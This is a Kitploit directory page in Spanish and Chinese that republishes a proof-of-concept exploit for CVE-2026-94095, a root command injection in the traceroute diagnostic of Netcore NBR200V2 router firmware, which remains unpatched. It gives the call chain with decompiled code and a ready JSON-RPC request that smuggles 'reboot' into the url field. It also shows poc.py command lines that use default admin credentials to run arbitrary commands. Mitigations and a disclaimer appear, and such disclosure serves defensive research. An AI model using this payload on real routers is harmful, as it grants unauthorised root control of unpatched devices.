Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-94095 — PoC para CVE-2026-94095, una inyección de comandos en traceroute en el firmware Netcore NBR200V2 a través de ubus JSON-RPC, que permite RCE como root para pruebas autorizadas. | Kitploit
Herramientas/GitHubGitHub/hackspeak/cve-2026-94095
Seguridad de Sistemas EmbebidosSeguridad IoTAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónSeguridad de Hardware e IoTPapers e Investigación
GitHubhackspeak/cve-2026-94095

CVE-2026-94095

PoC para CVE-2026-94095, una inyección de comandos en traceroute en el firmware Netcore NBR200V2 a través de ubus JSON-RPC, que permite RCE como root para pruebas autorizadas.

1hace 7h 27mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio

Netcore NBR200V2 - Inyección Remota de Comandos en la Función de Diagnóstico Traceroute (CVE-2026-94095)

CampoValor
FabricanteNetcore
ModeloNBR200V2
Versión de FirmwareV1.3.241127.071246
Componente Afectado/usr/bin/network_tools
Tipo de VulnerabilidadInyección de Comandos del SO (CWE-74 / CWE-77)
CVSS 3.19.9 (Crítico)
Vector de AtaqueRemoto (ubus JSON-RPC)
Requisito PrevioEndpoint ubus accesible + una sesión de bajo privilegio (sid)
Estado del FabricanteContactado con antelación; sin respuesta; sin parche en el momento de la divulgación

Descripción

El firmware V1.3.241127.071246 del Netcore NBR200V2 contiene una vulnerabilidad de inyección remota de comandos en la función de diagnóstico traceroute. El manejador de traceroute acepta un valor url controlado por el atacante desde ubus JSON-RPC, lo concatena en un comando de shell y ejecuta el comando resultante. Un atacante remoto puede usar esta falla para ejecutar comandos de shell arbitrarios, reiniciar el dispositivo o lograr el compromiso total del sistema.

Cadena de Vulnerabilidad

La solicitud remota se acepta como ubus JSON-RPC:

root@kitploit:~
POST /ubus {"jsonrpc":"2.0","id":20,"method":"call","params":["<sid>","network_tools","tools_traceroute",{"action":"start","url":"<attacker-controlled>","max_hop":1,"wanid":0}]}

El mapeo del método ubus enruta la solicitud a sub_401BD8:

root@kitploit:~
object.name = "network_tools"; object.methods = 0x412f4c; "tools_traceroute" -> sub_401BD8

sub_401BD8 analiza los datos JSON-RPC y los reenvía a tools_traceroute():

root@kitploit:~
blobmsg_parse(&off_412FA4, 4, &v21, a5 + 4, (v6 & 0xFFFFFF) - 4);
...
v25[0] = v18;              // action
v25[1] = v7;               // url
v25[2] = _bswapsi2(*v8);   // max_hop
...
result = tools_traceroute((int)v25);

tools_traceroute() construye un comando de shell usando el valor url no confiable:

root@kitploit:~
snprintf(
    v4, 0x100u,
    "(traceroute %s -m %d > %s && echo \"traceroute ending\" >> %s; touch %s)&",
    v2, *(_DWORD *)(a1 + 8), "/tmp/traceroute.txt", "/tmp/traceroute.txt", "/tmp/.tracroute_end");
system(v4);

La vulnerabilidad es estructuralmente idéntica al problema de ping, pero alcanza un sink y una ruta de ejecución diferentes. Debido a que se utiliza system(), los separadores de comandos como ;, && y los comentarios de shell son respetados. La función de diagnóstico se convierte por lo tanto en una primitiva de ejecución de comandos de propósito general.

Prueba de Concepto

root@kitploit:~
POST /ubus
Content-Type: application/json

{"jsonrpc":"2.0","id":20,"method":"call","params":["<sid>","network_tools","tools_traceroute",{"action":"start","url":"127.0.0.1;reboot;#","max_hop":1}]}

Efecto esperado: el router ejecuta reboot mientras procesa la tarea de traceroute. Se pueden sustituir comandos de shell arbitrarios en lugar de reboot.

Vulnerabilidades Relacionadas (Mismo Lote)

  • CVE-2026-94096 — Ruta de configuración de IP LAN (mismo binario, mismo patrón).
  • CVE-2026-94097 — Endpoint de diagnóstico CGI (CVSS 10.0).

Las tres alcanzan el mismo /usr/bin/network_tools; las funciones de diagnóstico en este binario comparten el mismo patrón inseguro, por lo que corregir un único punto de entrada no es suficiente.

Remediación

Sin parche del fabricante en el momento de la divulgación. Mitigaciones provisionales:

  1. No exponer la interfaz de gestión a redes no confiables; eliminar todas las asignaciones de gestión del lado WAN;
  2. Cambiar las credenciales predeterminadas y aplicar contraseñas fuertes y rotadas (la autenticación ubus es el requisito previo para este ataque);
  3. Restringir el endpoint ubus / de gestión a una subred de operaciones dedicada mediante firewall;
  4. Realizar seguimiento de las actualizaciones de firmware del fabricante y verificar las correcciones para CVE-2026-94095/94096/94097 en conjunto.

Créditos

Divulgación por el investigador independiente que publicó el informe técnico y coordinó (sin éxito) con el fabricante.


分发镜像说明(中文)

本仓库为 CVE-2026-94095(Netcore NBR200V2 traceroute 命令注入) 漏洞 PoC 的中转分发镜像(英文技术披露见上方 CVE-2026-94095.md)。内容依据公开披露文档整理,仅作存档与分发用途。PoC 仅供安全研究、漏洞验证与授权测试,请勿用于未授权目标。

漏洞简述 / Vulnerability Summary

  • CVE-2026-94095(同批:CVE-2026-94096 / CVE-2026-94097)
  • 影响产品:Netcore NBR200V2 企业路由器,固件 V1.3.241127.071246
  • 受影响组件:/usr/bin/network_tools(traceroute 诊断功能)
  • 类型:OS 命令注入(CWE-74 / CWE-77)
  • CVSS 3.1:9.9(Critical);CVSS 4.0:8.6;CVSS 2.0:9.0
  • 攻击面:ubus JSON-RPC 端点(POST /ubus)
  • 前置条件:可访问 ubus 接口 + 一个低权限会话(sid);弱口令/默认口令会显著降低门槛
  • 修复状态:披露者提前联系厂商,厂商零回应,暂无官方补丁

核心原理:tools_traceroute() 用 snprintf 把攻击者可控的 url 参数拼进 shell 命令,再交给 system() 执行;url 未做任何过滤/转义,分号 ;、&&、管道、注释符 # 均有效——诊断功能因此变成通用命令执行原语。

目录结构 / Layout

root@kitploit:~
CVE-2026-94095.md   —— 公开披露整理(调用链、反编译片段、PoC 请求)
poc.py              —— 可用 PoC 脚本(ubus JSON-RPC 注入,纯标准库)

环境与用法 / Requirements & Usage

  • 目标:未修复的 Netcore NBR200V2(实验室设备);需可访问 POST /ubus 与一个有效 sid
  • 依赖:Python 3(纯标准库,零第三方依赖)
root@kitploit:~
# 已有 sid:
python3 poc.py --target http://192.168.1.1 --sid <SESSION_ID> --cmd "id"

# 用账号口令获取 sid(弱口令/默认口令场景):
python3 poc.py --target http://192.168.1.1 --user admin --password admin --cmd "reboot"

⚠️ 命令会被拼接为 127.0.0.1;<命令>;# 注入 url 参数;reboot 会直接重启设备,请仅在授权/可销毁环境测试。

免责声明 / Disclaimer

本 PoC 仅供教学、安全研究与授权测试使用,仅可对自有或获得明确授权的设备运行。利用会以设备最高权限执行任意命令(默认运行于 root 上下文),请在可销毁的实验室环境中测试。

归属与许可 / Attribution & License

  • 漏洞由独立研究者公开披露并整理利用链;本仓库为其公开材料的镜像与 PoC 实现。
  • 分发仓库采用 MIT License(见 LICENSE)。

参考链接 / References

  • NVD:https://nvd.nist.gov/vuln/detail/CVE-2026-94095
  • CVE 记录:https://www.cve.org/CVERecord?id=CVE-2026-94095
  • 第三方分析(VulDB):https://vuldb.com/vuln/408024
Descargar herramienta